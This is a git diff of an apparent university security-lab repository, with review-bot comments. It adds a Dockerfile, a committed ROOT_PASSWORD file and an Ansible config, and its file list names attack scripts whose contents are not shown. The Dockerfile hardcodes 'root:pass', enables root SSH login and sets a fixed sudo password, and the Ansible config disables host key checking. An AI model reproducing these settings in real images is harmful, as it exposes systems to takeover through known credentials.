
No commits in common. 'd8727fe9bb6c35c6a27c1fa9c75bff255ca72a6b' and '7c50890c4ef87408f6fd24e51ba8314a4608d0f0' have entirely different histories.

  1. 15
      .vimrc
  2. 33
      Dockerfile
  3. 614
      LICENSE
  4. 3
      README.md
  5. 1
      ROOT_PASSWORD
  6. 11
      auto_update_hosts
  7. 35
      backup_files/ansible_cfg_text
  8. 2
      backup_files/ddos_atck_script.sh
  9. 28
      backup_files/fail2ban_script.sh
  10. 19
      backup_files/first_script.sh
  11. 1
      backup_files/hello_world.sh
  12. 6
      backup_files/inventory.yml
  13. 5
      backup_files/inventory_w.yml
  14. 54
      backup_files/iptables_rules.sh
  15. 10
      backup_files/medusa_script.sh
  16. 5276
      backup_files/passwd_list.txt
  17. 2
      backup_files/run.sh
  18. 8
      backup_files/script_update.sh
  19. 2
      backup_files/second_script.sh
  20. 5
      backup_files/test.retry
  21. 112
      backup_files/test.yml
  22. 4
      backup_files/test2.retry
  23. 48
      backup_files/test2.yml
  24. 4
      backup_files/test3.retry
  25. 60
      backup_files/test3.yml
  26. 26
      backup_files/vpn+backup/cr_vi_sec_vpn_my5.sh
  27. 6
      backup_files/vpn+backup/create-user.sh
  28. 47
      backup_files/vpn+backup/create-vpn.sh
  29. 22
      backup_files/vpn+backup/rm-user.sh
  30. 30
      backup_files/vpn+backup/rm_my5.sh
  31. 2
      backup_files/vpn+backup/show-conn-user.sh
  32. 2
      backup_files/vpn+backup/show-user.sh
  33. 16
      backup_files/vpn+backup/vi-userfile.sh
  34. 899
      backup_files/workingjail.local
  35. 37
      docker-compose.yml
  36. 8
      get_hosts
  37. 74
      install-vim-plugin.sh
  38. 108
      out.log
  39. 5275
      passwd_list
  40. 35
      project/ansible_cfg_text
  41. 2
      project/ansible_fail2ban.sh
  42. 2
      project/ansible_iptables.sh
  43. 2
      project/ddos_atck_script.sh
  44. 28
      project/fail2ban_script.sh
  45. 19
      project/first_script.sh
  46. 1
      project/hello_world.sh
  47. 6
      project/inventory.yml
  48. 5
      project/inventory_vpn.yml
  49. 5
      project/inventory_w.yml
  50. 54
      project/iptables_rules.sh
  51. 10
      project/medusa_script.sh
  52. 5276
      project/passwd_list.txt
  53. 2
      project/ping-to-me-vpn.sh
  54. 8
      project/script_update.sh
  55. 110
      project/sec_vpn_1.ovpn
  56. 110
      project/sec_vpn_2.ovpn
  57. 110
      project/sec_vpn_3.ovpn
  58. 110
      project/sec_vpn_4.ovpn
  59. 110
      project/sec_vpn_5.ovpn
  60. 2
      project/second_script.sh
  61. 4
      project/sshkey_script.sh
  62. 5
      project/test-ping.retry
  63. 27
      project/test-ping.yml
  64. 5
      project/test.retry
  65. 113
      project/test.yml
  66. 4
      project/test2.retry
  67. 76
      project/test2.yml
  68. 4
      project/test3.retry
  69. 60
      project/test3.yml
  70. 5
      project/test_fail2ban.retry
  71. 21
      project/test_fail2ban.yml
  72. 5
      project/test_iptables_rules.retry
  73. 21
      project/test_iptables_rules.yml
  74. 72
      sec_bootstrap
  75. 6
      shorewall/interfaces
  76. 11
      shorewall/policy
  77. 11
      shorewall/rules
  78. 6
      shorewall/zones
  79. 27
      ssh/id_rsa
  80. 1
      ssh/id_rsa.pub

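--- a/.vimrc
+++ b/.vimrc
@@ -0,0 +1,15 @@
+map <C-e> :NERDTreeToggle<CR>
+autocmd BufNewFile,BufRead *.vue,*.js set syntax=verilog tabstop=2|set shiftwidth=2|set noexpandtab autoindent
+augroup remember_folds
+autocmd!
+autocmd BufWinLeave * mkview
+autocmd BufWinEnter * silent! loadview
+augroup END
+" Useful for my Quick Notes feature in my tmuxrc
+augroup QuickNotes
+au BufWrite,VimLeave NOTES.otl mkview
+au BufRead NOTES.otl silent loadview
+augroup END
+set swapfile
+set dir=~/tmp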
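Review bot: `set dir=~/tmp` on the last line points swap files at a directory that nothing on this page creates — the Dockerfile copies this file to /home/docker but never makes a `tmp` there — so with `set swapfile` enabled on the line before, vim will report that it cannot open a swap file on every buffer it edits. Either create the directory in the Dockerfile (`RUN mkdir -p /home/docker/tmp && chown docker:docker /home/docker/tmp`) or give vim a fallback, `set dir=~/tmp//,/tmp//`, where the trailing `//` makes the swap file name encode the full path so edits of same-named files in different directories do not collide. The `set syntax=verilog` applied to `*.vue,*.js` on the second line looks like a leftover from another setup rather than intent; worth confirming, since it replaces the JavaScript highlighting vim would otherwise pick.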

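--- a/Dockerfile
+++ b/Dockerfile
@@ -0,0 +1,33 @@
+FROM localhost:5000/sec
+#
+USER root
+RUN export DEBIAN_FRONTEND=noninteractive && apt-get update && apt-get --no-install-recommends install -y openssh-server net-tools curl tcpdump shorewall sudo vim nmap dnsutils iputils-ping iptables wget python
+RUN apt-get autoremove --purge && apt clean
+RUN rm -rf /var/lib/apt/lists/*
+RUN mkdir -p /var/run/sshd
+RUN echo 'root:pass' | chpasswd
+RUN sed -i 's/PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config
+#
+# SSH login fix. Otherwise user is kicked off after login
+RUN sed 's@session\s*required\s*pam_loginuid.so@session optional pam_loginuid.so@g' -i /etc/pam.d/sshd
+#
+ENV NOTVISIBLE "in users profile"
+RUN echo "export VISIBLE=now" >> /etc/profile
+#RUN wget -k https://raw.githubusercontent.com/egalpin/apt-vim/master/install.sh
+#
+#
+#
+COPY sec_bootstrap /usr/bin
+COPY get_hosts /usr/bin
+COPY auto_update_hosts /usr/bin
+RUN mkdir -p /etc/shorewall
+COPY shorewall /etc/shorewall
+RUN mkdir -p /etc/opt
+RUN mkdir -p /project
+WORKDIR /project
+COPY install-vim-plugin.sh .
+#RUN bash ./install-vim-plugin.sh
+#RUN apt-vim install -y https://github.com/scrooloose/nerdtree.git
+RUN grep -qw ^docker /etc/passwd || useradd -m docker && echo "docker:docker" | chpasswd && adduser docker sudo
+COPY .vimrc /home/docker
+USER docker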
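Review bot: The image bakes fixed credentials into its layers — `RUN echo 'root:pass' | chpasswd` and, in the useradd line near the end, `echo "docker:docker" | chpasswd` for a user that is then added to `sudo` — and the `sed` on sshd_config switches on `PermitRootLogin yes`, so every container started from this image, and every copy pulled from the registry, carries the same known root and sudo passwords reachable over the openssh-server it installs; the file list also shows `ROOT_PASSWORD` and `ssh/id_rsa` in the repository, which belong neither in the build context nor in history. Remove the two chpasswd lines and the PermitRootLogin edit, leave sshd at its default, and have an entrypoint set or import credentials at container start from a mounted secret or runtime-injected SSH public keys, so no password or private key lands in a layer. `FROM localhost:5000/sec` is untagged, which makes the build unreproducible; pin a tag or digest. The cleanup on the two lines after the install (`apt-get autoremove --purge && apt clean` and `rm -rf /var/lib/apt/lists/*`) runs in separate layers, so it does not shrink the image; fold it into the `apt-get install` RUN, and `ENV NOTVISIBLE "in users profile"` should use the `key=value` form, as the space-separated form is deprecated.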

614
LICENSE

@ -1,614 +0,0 @@
GNU AFFERO GENERAL PUBLIC LICENSE
Version 3, 19 November 2007
Copyright (C) 2007 Free Software Foundation, Inc. <http s ://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies of this license
document, but changing it is not allowed.
Preamble
The GNU Affero General Public License is a free, copyleft license for software
and other kinds of works, specifically designed to ensure cooperation with
the community in the case of network server software.
The licenses for most software and other practical works are designed to take
away your freedom to share and change the works. By contrast, our General
Public Licenses are intended to guarantee your freedom to share and change
all versions of a program--to make sure it remains free software for all its
users.
When we speak of free software, we are referring to freedom, not price. Our
General Public Licenses are designed to make sure that you have the freedom
to distribute copies of free software (and charge for them if you wish), that
you receive source code or can get it if you want it, that you can change
the software or use pieces of it in new free programs, and that you know you
can do these things.
Developers that use our General Public Licenses protect your rights with two
steps: (1) assert copyright on the software, and (2) offer you this License
which gives you legal permission to copy, distribute and/or modify the software.
A secondary benefit of defending all users' freedom is that improvements made
in alternate versions of the program, if they receive widespread use, become
available for other developers to incorporate. Many developers of free software
are heartened and encouraged by the resulting cooperation. However, in the
case of software used on network servers, this result may fail to come about.
The GNU General Public License permits making a modified version and letting
the public access it on a server without ever releasing its source code to
the public.
The GNU Affero General Public License is designed specifically to ensure that,
in such cases, the modified source code becomes available to the community.
It requires the operator of a network server to provide the source code of
the modified version running there to the users of that server. Therefore,
public use of a modified version, on a publicly accessible server, gives the
public access to the source code of the modified version.
An older license, called the Affero General Public License and published by
Affero, was designed to accomplish similar goals. This is a different license,
not a version of the Affero GPL, but Affero has released a new version of
the Affero GPL which permits relicensing under this license.
The precise terms and conditions for copying, distribution and modification
follow.
TERMS AND CONDITIONS
0. Definitions.
"This License" refers to version 3 of the GNU Affero General Public License.
"Copyright" also means copyright-like laws that apply to other kinds of works,
such as semiconductor masks.
"The Program" refers to any copyrightable work licensed under this License.
Each licensee is addressed as "you". "Licensees" and "recipients" may be individuals
or organizations.
To "modify" a work means to copy from or adapt all or part of the work in
a fashion requiring copyright permission, other than the making of an exact
copy. The resulting work is called a "modified version" of the earlier work
or a work "based on" the earlier work.
A "covered work" means either the unmodified Program or a work based on the
Program.
To "propagate" a work means to do anything with it that, without permission,
would make you directly or secondarily liable for infringement under applicable
copyright law, except executing it on a computer or modifying a private copy.
Propagation includes copying, distribution (with or without modification),
making available to the public, and in some countries other activities as
well.
To "convey" a work means any kind of propagation that enables other parties
to make or receive copies. Mere interaction with a user through a computer
network, with no transfer of a copy, is not conveying.
An interactive user interface displays "Appropriate Legal Notices" to the
extent that it includes a convenient and prominently visible feature that
(1) displays an appropriate copyright notice, and (2) tells the user that
there is no warranty for the work (except to the extent that warranties are
provided), that licensees may convey the work under this License, and how
to view a copy of this License. If the interface presents a list of user commands
or options, such as a menu, a prominent item in the list meets this criterion.
1. Source Code.
The "source code" for a work means the preferred form of the work for making
modifications to it. "Object code" means any non-source form of a work.
A "Standard Interface" means an interface that either is an official standard
defined by a recognized standards body, or, in the case of interfaces specified
for a particular programming language, one that is widely used among developers
working in that language.
The "System Libraries" of an executable work include anything, other than
the work as a whole, that (a) is included in the normal form of packaging
a Major Component, but which is not part of that Major Component, and (b)
serves only to enable use of the work with that Major Component, or to implement
a Standard Interface for which an implementation is available to the public
in source code form. A "Major Component", in this context, means a major essential
component (kernel, window system, and so on) of the specific operating system
(if any) on which the executable work runs, or a compiler used to produce
the work, or an object code interpreter used to run it.
The "Corresponding Source" for a work in object code form means all the source
code needed to generate, install, and (for an executable work) run the object
code and to modify the work, including scripts to control those activities.
However, it does not include the work's System Libraries, or general-purpose
tools or generally available free programs which are used unmodified in performing
those activities but which are not part of the work. For example, Corresponding
Source includes interface definition files associated with source files for
the work, and the source code for shared libraries and dynamically linked
subprograms that the work is specifically designed to require, such as by
intimate data communication or control flow between those
subprograms and other parts of the work.
The Corresponding Source need not include anything that users can regenerate
automatically from other parts of the Corresponding Source.
The Corresponding Source for a work in source code form is that same work.
2. Basic Permissions.
All rights granted under this License are granted for the term of copyright
on the Program, and are irrevocable provided the stated conditions are met.
This License explicitly affirms your unlimited permission to run the unmodified
Program. The output from running a covered work is covered by this License
only if the output, given its content, constitutes a covered work. This License
acknowledges your rights of fair use or other equivalent, as provided by copyright
law.
You may make, run and propagate covered works that you do not convey, without
conditions so long as your license otherwise remains in force. You may convey
covered works to others for the sole purpose of having them make modifications
exclusively for you, or provide you with facilities for running those works,
provided that you comply with the terms of this License in conveying all material
for which you do not control copyright. Those thus making or running the covered
works for you must do so exclusively on your behalf, under your direction
and control, on terms that prohibit them from making any copies of your copyrighted
material outside their relationship with you.
Conveying under any other circumstances is permitted solely under the conditions
stated below. Sublicensing is not allowed; section 10 makes it unnecessary.
3. Protecting Users' Legal Rights From Anti-Circumvention Law.
No covered work shall be deemed part of an effective technological measure
under any applicable law fulfilling obligations under article 11 of the WIPO
copyright treaty adopted on 20 December 1996, or similar laws prohibiting
or restricting circumvention of such measures.
When you convey a covered work, you waive any legal power to forbid circumvention
of technological measures to the extent such circumvention is effected by
exercising rights under this License with respect to the covered work, and
you disclaim any intention to limit operation or modification of the work
as a means of enforcing, against the work's users, your or third parties'
legal rights to forbid circumvention of technological measures.
4. Conveying Verbatim Copies.
You may convey verbatim copies of the Program's source code as you receive
it, in any medium, provided that you conspicuously and appropriately publish
on each copy an appropriate copyright notice; keep intact all notices stating
that this License and any non-permissive terms added in accord with section
7 apply to the code; keep intact all notices of the absence of any warranty;
and give all recipients a copy of this License along with the Program.
You may charge any price or no price for each copy that you convey, and you
may offer support or warranty protection for a fee.
5. Conveying Modified Source Versions.
You may convey a work based on the Program, or the modifications to produce
it from the Program, in the form of source code under the terms of section
4, provided that you also meet all of these conditions:
a) The work must carry prominent notices stating that you modified it, and
giving a relevant date.
b) The work must carry prominent notices stating that it is released under
this License and any conditions added under section 7. This requirement modifies
the requirement in section 4 to "keep intact all notices".
c) You must license the entire work, as a whole, under this License to anyone
who comes into possession of a copy. This License will therefore apply, along
with any applicable section 7 additional terms, to the whole of the work,
and all its parts, regardless of how they are packaged. This License gives
no permission to license the work in any other way, but it does not invalidate
such permission if you have separately received it.
d) If the work has interactive user interfaces, each must display Appropriate
Legal Notices; however, if the Program has interactive interfaces that do
not display Appropriate Legal Notices, your work need not make them do so.
A compilation of a covered work with other separate and independent works,
which are not by their nature extensions of the covered work, and which are
not combined with it such as to form a larger program, in or on a volume of
a storage or distribution medium, is called an "aggregate" if the compilation
and its resulting copyright are not used to limit the access or legal rights
of the compilation's users beyond what the individual works permit. Inclusion
of a covered work in an aggregate does not cause this License to apply to
the other parts of the aggregate.
6. Conveying Non-Source Forms.
You may convey a covered work in object code form under the terms of sections
4 and 5, provided that you also convey the machine-readable Corresponding
Source under the terms of this License, in one of these ways:
a) Convey the object code in, or embodied in, a physical product (including
a physical distribution medium), accompanied by the Corresponding Source fixed
on a durable physical medium customarily used for software interchange.
b) Convey the object code in, or embodied in, a physical product (including
a physical distribution medium), accompanied by a written offer, valid for
at least three years and valid for as long as you offer spare parts or customer
support for that product model, to give anyone who possesses the object code
either (1) a copy of the Corresponding Source for all the software in the
product that is covered by this License, on a durable physical medium customarily
used for software interchange, for a price no more than your reasonable cost
of physically performing this conveying of source, or (2) access to copy the
Corresponding Source from a network server at no charge.
c) Convey individual copies of the object code with a copy of the written
offer to provide the Corresponding Source. This alternative is allowed only
occasionally and noncommercially, and only if you received the object code
with such an offer, in accord with subsection 6b.
d) Convey the object code by offering access from a designated place (gratis
or for a charge), and offer equivalent access to the Corresponding Source
in the same way through the same place at no further charge. You need not
require recipients to copy the Corresponding Source along with the object
code. If the place to copy the object code is a network server, the Corresponding
Source may be on a different server (operated by you or a third party) that
supports equivalent copying facilities, provided you maintain clear directions
next to the object code saying where to find the Corresponding Source. Regardless
of what server hosts the Corresponding Source, you remain obligated to ensure
that it is available for as long as needed to satisfy these requirements.
e) Convey the object code using peer-to-peer transmission, provided you inform
other peers where the object code and Corresponding Source of the work are
being offered to the general public at no charge under subsection 6d.
A separable portion of the object code, whose source code is excluded from
the Corresponding Source as a System Library, need not be included in conveying
the object code work.
A "User Product" is either (1) a "consumer product", which means any tangible
personal property which is normally used for personal, family, or household
purposes, or (2) anything designed or sold for incorporation into a dwelling.
In determining whether a product is a consumer product, doubtful cases shall
be resolved in favor of coverage. For a particular product received by a particular
user, "normally used" refers to a typical or common use of that class of product,
regardless of the status of the particular user or of the way in which the
particular user actually uses, or expects or is expected to use, the product.
A product is a consumer product regardless of whether the product has substantial
commercial, industrial or non-consumer uses, unless such uses represent the
only significant mode of use of the product.
"Installation Information" for a User Product means any methods, procedures,
authorization keys, or other information required to install and execute modified
versions of a covered work in that User Product from a modified version of
its Corresponding Source. The information must suffice to ensure that the
continued functioning of the modified object code is in no case prevented
or interfered with solely because modification has been made.
If you convey an object code work under this section in, or with, or specifically
for use in, a User Product, and the conveying occurs as part of a transaction
in which the right of possession and use of the User Product is transferred
to the recipient in perpetuity or for a fixed term (regardless of how the
transaction is characterized), the Corresponding Source conveyed under this
section must be accompanied by the Installation Information. But this requirement
does not apply if neither you nor any third party retains the ability to install
modified object code on the User Product (for example, the work has been installed
in ROM).
The requirement to provide Installation Information does not include a requirement
to continue to provide support service, warranty, or updates for a work that
has been modified or installed by the recipient, or for the User Product in
which it has been modified or installed. Access to a network may be denied
when the modification itself materially and adversely affects the operation
of the network or violates the rules and protocols for communication across
the network.
Corresponding Source conveyed, and Installation Information provided, in accord
with this section must be in a format that is publicly documented (and with
an implementation available to the public in source code form), and must require
no special password or key for unpacking, reading or copying.
7. Additional Terms.
"Additional permissions" are terms that supplement the terms of this License
by making exceptions from one or more of its conditions. Additional permissions
that are applicable to the entire Program shall be treated as though they
were included in this License, to the extent that they are valid under applicable
law. If additional permissions apply only to part of the Program, that part
may be used separately under those permissions, but the entire Program remains
governed by this License without regard to the additional permissions.
When you convey a copy of a covered work, you may at your option remove any
additional permissions from that copy, or from any part of it. (Additional
permissions may be written to require their own removal in certain cases when
you modify the work.) You may place additional permissions on material, added
by you to a covered work, for which you have or can give appropriate copyright
permission.
Notwithstanding any other provision of this License, for material you add
to a covered work, you may (if authorized by the copyright holders of that
material) supplement the terms of this License with terms:
a) Disclaiming warranty or limiting liability differently from the terms of
sections 15 and 16 of this License; or
b) Requiring preservation of specified reasonable legal notices or author
attributions in that material or in the Appropriate Legal Notices displayed
by works containing it; or
c) Prohibiting misrepresentation of the origin of that material, or requiring
that modified versions of such material be marked in reasonable ways as different
from the original version; or
d) Limiting the use for publicity purposes of names of licensors or authors
of the material; or
e) Declining to grant rights under trademark law for use of some trade names,
trademarks, or service marks; or
f) Requiring indemnification of licensors and authors of that material by
anyone who conveys the material (or modified versions of it) with contractual
assumptions of liability to the recipient, for any liability that these contractual
assumptions directly impose on those licensors and authors.
All other non-permissive additional terms are considered "further restrictions"
within the meaning of section 10. If the Program as you received it, or any
part of it, contains a notice stating that it is governed by this License
along with a term that is a further restriction, you may remove that term.
If a license document contains a further restriction but permits relicensing
or conveying under this License, you may add to a covered work material governed
by the terms of that license document, provided that the further restriction
does not survive such relicensing or conveying.
If you add terms to a covered work in accord with this section, you must place,
in the relevant source files, a statement of the additional terms that apply
to those files, or a notice indicating where to find the applicable terms.
Additional terms, permissive or non-permissive, may be stated in the form
of a separately written license, or stated as exceptions; the above requirements
apply either way.
8. Termination.
You may not propagate or modify a covered work except as expressly provided
under this License. Any attempt otherwise to propagate or modify it is void,
and will automatically terminate your rights under this License (including
any patent licenses granted under the third paragraph of section 11).
However, if you cease all violation of this License, then your license from
a particular copyright holder is reinstated (a) provisionally, unless and
until the copyright holder explicitly and finally terminates your license,
and (b) permanently, if the copyright holder fails to notify you of the violation
by some reasonable means prior to 60 days after the cessation.
Moreover, your license from a particular copyright holder is reinstated permanently
if the copyright holder notifies you of the violation by some reasonable means,
this is the first time you have received notice of violation of this License
(for any work) from that copyright holder, and you cure the violation prior
to 30 days after your receipt of the notice.
Termination of your rights under this section does not terminate the licenses
of parties who have received copies or rights from you under this License.
If your rights have been terminated and not permanently reinstated, you do
not qualify to receive new licenses for the same material under section 10.
9. Acceptance Not Required for Having Copies.
You are not required to accept this License in order to receive or run a copy
of the Program. Ancillary propagation of a covered work occurring solely as
a consequence of using peer-to-peer transmission to receive a copy likewise
does not require acceptance. However, nothing other than this License grants
you permission to propagate or modify any covered work. These actions infringe
copyright if you do not accept this License. Therefore, by modifying or propagating
a covered work, you indicate your acceptance of this License to do so.
10. Automatic Licensing of Downstream Recipients.
Each time you convey a covered work, the recipient automatically receives
a license from the original licensors, to run, modify and propagate that work,
subject to this License. You are not responsible for enforcing compliance
by third parties with this License.
An "entity transaction" is a transaction transferring control of an organization,
or substantially all assets of one, or subdividing an organization, or merging
organizations. If propagation of a covered work results from an entity transaction,
each party to that transaction who receives a copy of the work also receives
whatever licenses to the work the party's predecessor in interest had or could
give under the previous paragraph, plus a right to possession of the Corresponding
Source of the work from the predecessor in interest, if the predecessor has
it or can get it with reasonable efforts.
You may not impose any further restrictions on the exercise of the rights
granted or affirmed under this License. For example, you may not impose a
license fee, royalty, or other charge for exercise of rights granted under
this License, and you may not initiate litigation (including a cross-claim
or counterclaim in a lawsuit) alleging that any patent claim is infringed
by making, using, selling, offering for sale, or importing the Program or
any portion of it.
11. Patents.
A "contributor" is a copyright holder who authorizes use under this License
of the Program or a work on which the Program is based. The work thus licensed
is called the contributor's "contributor version".
A contributor's "essential patent claims" are all patent claims owned or controlled
by the contributor, whether already acquired or hereafter acquired, that would
be infringed by some manner, permitted by this License, of making, using,
or selling its contributor version, but do not include claims that would be
infringed only as a consequence of further modification of the contributor
version. For purposes of this definition, "control" includes the right to
grant patent sublicenses in a manner consistent with the requirements of this
License.
Each contributor grants you a non-exclusive, worldwide, royalty-free patent
license under the contributor's essential patent claims, to make, use, sell,
offer for sale, import and otherwise run, modify and propagate the contents
of its contributor version.
In the following three paragraphs, a "patent license" is any express agreement
or commitment, however denominated, not to enforce a patent (such as an express
permission to practice a patent or covenant not to s ue for patent infringement).
To "grant" such a patent license to a party means to make such an agreement
or commitment not to enforce a patent against the party.
If you convey a covered work, knowingly relying on a patent license, and the
Corresponding Source of the work is not available for anyone to copy, free
of charge and under the terms of this License, through a publicly available
network server or other readily accessible means, then you must either (1)
cause the Corresponding Source to be so available, or (2) arrange to deprive
yourself of the benefit of the patent license for this particular work, or
(3) arrange, in a manner consistent with the requirements of this License,
to extend the patent
license to downstream recipients. "Knowingly relying" means you have actual
knowledge that, but for the patent license, your conveying the covered work
in a country, or your recipient's use of the covered work in a country, would
infringe one or more identifiable patents in that country that you have reason
to believe are valid.
If, pursuant to or in connection with a single transaction or arrangement,
you convey, or propagate by procuring conveyance of, a covered work, and grant
a patent license to some of the parties receiving the covered work authorizing
them to use, propagate, modify or convey a specific copy of the covered work,
then the patent license you grant is automatically extended to all recipients
of the covered work and works based on it.
A patent license is "discriminatory" if it does not include within the scope
of its coverage, prohibits the exercise of, or is conditioned on the non-exercise
of one or more of the rights that are specifically granted under this License.
You may not convey a covered work if you are a party to an arrangement with
a third party that is in the business of distributing software, under which
you make payment to the third party based on the extent of your activity of
conveying the work, and under which the third party grants, to any of the
parties who would receive the covered work from you, a discriminatory patent
license (a) in connection with copies of the covered work conveyed by you
(or copies made from those copies), or (b) primarily for and in connection
with specific products or compilations that contain the covered work, unless
you entered into that arrangement, or that patent license was granted, prior
to 28 March 2007.
Nothing in this License shall be construed as excluding or limiting any implied
license or other defenses to infringement that may otherwise be available
to you under applicable patent law.
12. No Surrender of Others' Freedom.
If conditions are imposed on you (whether by court order, agreement or otherwise)
that contradict the conditions of this License, they do not excuse you from
the conditions of this License. If you cannot convey a covered work so as
to satisfy simultaneously your obligations under this License and any other
pertinent obligations, then as a consequence you may
not convey it at all. For example, if you agree to terms that obligate you
to collect a royalty for further conveying from those to whom you convey the
Program, the only way you could satisfy both those terms and this License
would be to refrain entirely from conveying the Program.
13. Remote Network Interaction; Use with the GNU General Public License.
Notwithstanding any other provision of this License, if you modify the Program,
your modified version must prominently offer all users interacting with it
remotely through a computer network (if your version supports such interaction)
an opportunity to receive the Corresponding Source of your version by providing
access to the Corresponding Source from a network server at no charge, through
some standard or customary means of facilitating copying of software. This
Corresponding Source shall include the Corresponding Source for any work covered
by version 3 of the GNU General Public License that is incorporated pursuant
to the following paragraph.
Notwithstanding any other provision of this License, you have permission to
link or combine any covered work with a work licensed under version 3 of the
GNU General Public License into a single combined work, and to convey the
resulting work. The terms of this License will continue to apply to the part
which is the covered work, but the work with which it is combined will remain
governed by version 3 of the GNU General Public License.
14. Revised Versions of this License.
The Free Software Foundation may publish revised and/or new versions of the
GNU Affero General Public License from time to time. Such new versions will
be similar in spirit to the present version, but may differ in detail to address
new problems or concerns.
Each version is given a distinguishing version number. If the Program specifies
that a certain numbered version of the GNU Affero General Public License "or
any later version" applies to it, you have the option of following the terms
and conditions either of that numbered version or of any later version published
by the Free Software Foundation. If the Program does not specify a version
number of the GNU Affero General Public License, you may choose any version
ever published by the Free Software Foundation.
If the Program specifies that a proxy can decide which future versions of
the GNU Affero General Public License can be used, that proxy's public statement
of acceptance of a version permanently authorizes you to choose that version
for the Program.
Later license versions may give you additional or different permissions. However,
no additional obligations are imposed on any author or copyright holder as
a result of your choosing to follow a later version.
15. Disclaimer of Warranty.
THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE
LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR
OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER
EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS
TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM
PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR
CORRECTION.
16. Limitation of Liability.
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL
ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS THE PROGRAM
AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL,
INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO
USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED
INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE
PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER
PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
17. Interpretation of Sections 15 and 16.
If the disclaimer of warranty and limitation of liability provided above cannot
be given local legal effect according to their terms, reviewing courts shall
apply local law that most closely approximates an absolute waiver of all civil
liability in connection with the Program, unless a warranty or assumption
of liability accompanies a copy of the Program in return for a fee. END OF
TERMS AND CONDITIONS
How to Apply These Terms to Your New Programs
If you develop a new program, and you want it to be of the greatest possible
use to the public, the best way to achieve this is to make it free software
which everyone can redistribute and change under these terms.
To do so, attach the following notices to the program. It is safest to attach
them to the start of each source file to most effectively state the exclusion
of warranty; and each file should have at least the "copyright" line and a
pointer to where the full notice is found.
<one line to give the program's name and a brief idea of what it does.>
Copyright (C) <year> <name of author>
This program is free software: you can redistribute it and/or modify it under
the terms of the GNU Affero General Public License as published by the Free
Software Foundation, either version 3 of the License, or (at your option)
any later version.
This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more
details.
You should have received a copy of the GNU Affero General Public License along
with this program. If not, see <http s ://www.gnu.org/licenses/>.
Also add information on how to contact you by electronic and paper mail.
If your software can interact with users remotely through a computer network,
you should also make sure that it provides a way for users to get its source.
For example, if your program is a web application, its interface could display
a "Source" link that leads users to an archive of the code. There are many
ways you could offer source, and different solutions will be better for different
programs; see section 13 for the specific requirements.
You should also get your employer (if you work as a programmer) or school,
if any, to sign a "copyright disclaimer" for the program, if necessary. For
more information on this, and how to apply and follow the GNU AGPL, see <http
s ://www.gnu.org/licenses/>.

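--- a/README.md
+++ b/README.md
@@ -1,3 +0,0 @@
-# ask_2020_ade
-Uniwa 2020 ask Security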

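--- a/ROOT_PASSWORD
+++ b/ROOT_PASSWORD
@@ -0,0 +1 @@
+ROOT_PASSWORD="pass"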
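Review bot: A credentials file (`ROOT_PASSWORD="pass"`) is being committed to the repository; once it is in git history it stays recoverable after any later deletion, so the value has to be treated as public and rotated wherever it was used. Even for a lab, keep the file out of version control and out of the Docker build context (`ROOT_PASSWORD` in both .gitignore and .dockerignore) and hand the value to the build as a BuildKit secret (`RUN --mount=type=secret,id=<id> …`) or to the container via `--env-file` at run time, never via `ARG`/`ENV`, which remain visible in `docker history`. If a template is wanted, commit `ROOT_PASSWORD.example` with a placeholder and describe it in the README. How the Dockerfile or docker-compose.yml in this change consume the file is not visible here, so the exact wiring needs checking there.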

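--- a/auto_update_hosts
+++ b/auto_update_hosts
@@ -0,0 +1,11 @@
+#!/bin/sh
+hosts=$(get_hosts)
+printf "%s" "$hosts" > "$1"
+while sleep 2
+do
+current_hosts=$(get_hosts)
+[ "$hosts" != "$current_hosts" ] && printf "%s" "$current_hosts" > "$1"
+hosts=$current_hosts
+done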
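Review bot: `"$1"` is used as the output path in both `printf … > "$1"` statements without ever being checked, so a run with no argument makes every write fail with "cannot create" and the loop keeps retrying every two seconds; add `[ -n "$1" ] || { echo "usage: $0 <hosts-file>" >&2; exit 1; }` before the first write. `get_hosts` is resolved through PATH, so when it is not installed the script silently writes an empty file; `command -v get_hosts >/dev/null || exit 1` catches that. The write is also not atomic, so a consumer reading the file mid-write sees a truncated host list — write to `"$1.tmp"` and `mv` it into place.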

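--- a/backup_files/ansible_cfg_text
+++ b/backup_files/ansible_cfg_text
@@ -0,0 +1,35 @@
+# config file for ansible -- https://ansible.com/
+# ===============================================
+# nearly all parameters can be overridden in ansible-playbook
+# or with command line flags. ansible will read ANSIBLE_CONFIG,
+# ansible.cfg in the current working directory, .ansible.cfg in
+# the home directory or /etc/ansible/ansible.cfg, whichever it
+# finds first
+[defaults]
+host_key_checking = False
+# some basic default values...
+#inventory = /etc/ansible/hosts
+#library = /usr/share/my_modules/
+#module_utils = /usr/share/my_module_utils/
+#remote_tmp = ~/.ansible/tmp
+#local_tmp = ~/.ansible/tmp
+#plugin_filters_cfg = /etc/ansible/plugin_filters.yml
+#forks = 5
+#poll_interval = 15
+#sudo_user = root
+#ask_sudo_pass = True
+#ask_pass = True
+#transport = smart
+#remote_port = 22
+#module_lang = C
+#module_set_locale = False
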